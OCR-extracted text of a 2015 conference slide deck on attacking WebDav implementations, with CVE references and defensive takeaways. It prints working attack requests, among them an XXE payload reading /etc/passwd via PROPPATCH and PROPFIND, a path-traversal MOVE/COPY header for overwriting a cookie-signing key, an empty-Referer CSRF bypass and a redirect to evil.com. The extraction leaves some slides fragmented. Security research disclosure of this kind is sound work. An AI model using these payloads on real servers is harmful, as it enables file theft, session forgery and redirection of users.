2015 
Vulnerabilities in various WebDav implementations 


What should a hacker know about WebDav? 
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Short BIO — Mikhail Egorov 


Application Security Engineer at Odin [ http://www.odin.com ] 


Security researcher and bug hunter 
Graduated from BMSTU with MSc. in Information Security [ IU8 ] 
Holds OSCP and CISSP certificates 


See my blog [ http://0ang3el.blogspot.com ] 
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| <q | WebDav is complex 


> Many standards that prescribes how to implement various WebDav methods 
RFC 4918, RFC 3253, RFC 3648, RFC 3744, RFC 5323, RFC 4437, RFC 5842 


> Many WebDav methods 


OPTIONS, TRACE, GET, HEAD, POST, PUT, DELETE, COPY, MOVE, PROPPATCH, 
PROPE IND, MKCOL, LOCK, UNLOCK, SEARCH, BIND, UNBIND, REBIND, 
MKREDIRECTREF, UPDATEREDIRECTREF, ORDERPATCH, ACL, REPORT 


> Different Webdav implementations 


www.zeronights.org 


v Vv VV 


Y ' 


ZERO NIGHTS 
Generic approach 
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Try various XXE attacks 


Issue OPTIONS requests and see what “interesting” methods are supported by 
WebDav library 


Try attack that follows from security considerations section of RFCs and 
“common sense” for all “interesting” methods 


Observe source code, if available, to find various implementation flaws 
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| WebDav XXE attacks 


> Methods PROPPATCH, PROPFIND, LOCK, etc. accept XML as input 


D Especially Java implementations are vulnerable à 


www.zeronights.org 


NI | EE Jacrabbit WebDav XXE 


> CVE-2015-1833 [http://www.securityfocus.com/archive/1/535582 ] 
D Exploit code [ https://www.exploit-db.com/exploits/37110/ | 
> Video PoC [ https://www.youtube.com/watch ?v=Hg3AXo0G89Gs ] 
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> CVE-2015-7326 [http://www.securityfocus.com/archive/1/536813 ] 


www.zeronights.org 


\ zero MIA f 


| cloudme.com XXE 


D CloudMe is a secure European service that makes your life a little bit easier. 
With CloudMe you don’t have to think twice about where your files are, they're 


always with you ... 


D https://webdav.cloudme.com is vulnerable WebDav endpoint 
S RS | 
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N ‘Apache Sling OOXML parsing XXE 
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D Apache Tika OSGi bundle to parse documents 
D Apache POI is used to parse OOXML documents 


D Apache POI library XXE [ https://access.redhat.com/security/cve/CVE-2014-3529 ] 
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| Dacke Jackrabbit WebDav CSRF 


JCR-3909 [ https://issues.apache.org/jira/browse/JCR-3909 ] 
POST request is allowed and treated as PUT 
There is Refer-based CSRF protection, but empty Referer bypasses it 


Could be used to mount XXE attack for systems in the internal network! 
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~S Exploiting WebDav XXE tricks 


D Create resource 
PUT /resource HTTP/1.1 
Hack 
> Write content of the file to a property of the resource with PROPPATCH 
method 


PROPPATCH /resource HTTP/1.1 


<?xml version=" 1.0” encoding="UTF-87?> 

<!DOCTYPE propertyupdate | 

<!ENTITY loot SYSTEM “file:///etc/passwd”> ]> 
<D:propertyupdate xmlns:D="DAV: ”><D:set><D:prop> 
<a xmlns=“http://this.is.xxe.baby”>&loot;</a> 
</D:prop></D:set></D:propertyupdate> 
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Exploiting WebDav XXE tricks 


> Read property with content of the file with PROPFIND method 
PROPFIND /resource HTTP/1.1 
<?xml version=“1.0” encoding=“UTF-8”?> 
<propfind xmlns=“DAV:”><prop> 


<q:a xmlns:q=“http://this.is.xxe.baby”/> 
</prop></propfind> 
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> OOB XXE will work with any method that supports XML input 


e When general external entities are prohibited 


>> SSRF attack will work with any method that supports XML input 
e When only external DTDs are allowed 
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> Cookie AUTHN [ preferred method in Windows, from Win7 ] 
e  miltonUserUrl=/users/admin/;Path=/;Expires=Thu, 06-Mar-2014 20:55:23 GMT;Max-Age=31536000 


e  miltonUserUrlHash=0.884150694443924:9c74dc9fb62c2926c911ce07b5e7dcb2;Path=/;Expires=Thu, 06-Mar-2014 
20:55:23 GMT;Max-Age=31536000;HttpOnly 


> Cookie is signed using HMAC-SHA1 
e key is in keys.txt file stored in java.io.tmpdir directory 
D Path traversal in Destination header of MOVE and COPY requests 
e  http://127.0.0.1:8080/../../../../../../../../../../_DAV/HACK/tmp 
e We can overwrite keys.txt file © 
e After app server restart we can craft valid cookies © 
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Confluence WebDav DoS attack 
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Based on Apache Jackrabbit WebDav code 
Supports Depth: infinity header in PROPFIND request 


Allows DOCTYPE declaration 
Billion Laughs like attack, but with limited number [ 64000 ] of entity expansions, is possible 


Xerces-J library vulnerable to CVE-2013-4002 have been used 
https://jira.atlassian.com/browse/CONF-37991 
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arbitrary site 


MKREDIRECTREF /good. 
Host: webdav.yandex. 


<?xml version="1.0" 
<D:mkredirectref 
<D:reftarget> 


| Yandex.Disk invalidated redirect 


WebDav access to Yandex.Disk — http://webdav.yandex.ru 
Supports MKREDIRECTREF request 


It is possible to create resource that will redirect the victim from Yandex.Disk to 


txt HTTP/1.1 
ru 


encoding="utf-8" ?> 
xmlns:D="DAV:"> 


<D:href>http: //evil.com</D:href> 


</D:reftarget> 


</D:mkredirectref> 
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| Takeaways 


d 


WebDav is a complex protocol, it extends attack surface of your system 


WebDav-related RFCs have security considerations parts, unfortunately, many 
WebDav implementations ignore security considerations 


WebDav libraries in Java suffers from XXE issues, because most XML parsers in 
Java are insecure in default configuration 
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